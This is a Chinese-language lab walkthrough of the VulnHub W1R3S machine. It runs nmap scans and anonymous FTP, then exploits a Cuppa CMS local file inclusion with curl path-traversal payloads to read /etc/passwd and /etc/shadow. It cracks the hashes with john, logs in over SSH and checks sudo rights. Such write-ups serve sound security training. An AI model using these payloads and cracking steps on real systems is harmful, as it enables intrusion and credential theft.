# 靶机下载
vulnhub -> W1R3S 1.0.1
# nmap扫描收集信息
## 主机发现
**-sn**参数,仅探活主机
`nmap -sn 192.168.1.0/24`
通过对比新增主机,可以确定192.168.1.14是靶机
## 扫描开放端口
`nmap -sT --min-rate 10000 -p- 192.168.1.14 -oA ./port`
**-sT**参数是通过完整的tcp连接过程来确定端口开放状态,结果更准确也更隐蔽。**--min-rate**参数指定扫描速率,取准确度跟速度的平衡值。**-p-**参数指定扫描所有端口。**-oA**参数将结果输出成三种格式的文件,方便后面查看。
## 扫描详细信息
`nmap -sT -sC -sV -O 192.168.1.14 -p21,22,80,3306 -oA ./detail`
## 扫udp端口开放情况
`nmap -sU --top-ports 20 192.168.1.14`
## 脚本扫描
`nmap --script=vuln -p21,22,80,3306 192.168.1.14 -oA ./vuln`
## 确定任务优先级
21端口跑的是ftp服务而且可以匿名登录,可能有信息泄露。22端口跑的ssh,爆破进去的希望不大,优先级往后排。80端口跑的http,比较重要。3306端口跑的mysql,可以尝试去登录一下。优先级21,3306,80,22.
## ftp渗透
ftp 192.168.1.14
利用anonymous登录
利用get把文件都下载下来,注意进去ftp后先执行binary命令可以保证下载下来的文件不会损坏
这个泄露了员工姓名和对应职位,其他的文件都没看出什么信息
## 尝试登录mysql
不允许远程登录(这里我网络环境变了,靶机ip也变了)
## 渗透80端口
前面得到wordpress页面,拼接访问
无论点击哪个按钮都会跳转到localhost
扫目录,看看有没有新的突破口
`dirsearch -u http://192.168.128.58 --json-report=result`
得到很多路径,拼接访问。有个cuppa cms的安装页面
点击next往下安装,安装成功但是创建用户失败
查有没有历史漏洞
`searchsploit cuppa cms`
把exp复制到当前目录
`searchsploit -m 25971.txt`
里面列出访问路径,漏洞出现行,文件包含漏洞,exp示范。有本地任意文件包含,能实现任意文件读取
尝试拼接访问,404
往administrator目录后拼接,404
删掉/cuppa后往administrator拼接,访问成功但是没内容返回
到网上找cms源码看看
要post方式传参
`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/passwd"`
`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/shadow"`
将有哈希的保存到一个文件,然后用john爆破,`john shadowtest --wordlist /usr/share/wordlists/rockyou.txt`。等待运行完毕使用`john --show shadow文件名`查看
## ssh连接
得到密码后通过ssh连接靶机,`ssh username@ip`
查看当前权限,可以看到用sudo命令权限
`id`
查看可以sudo执行的命令,3个ALL相当于root权限
`sudo -l`
